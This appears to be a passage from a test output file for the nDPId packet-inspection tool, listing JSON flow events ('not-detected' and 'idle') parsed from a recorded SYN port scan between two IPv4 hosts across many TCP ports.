-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 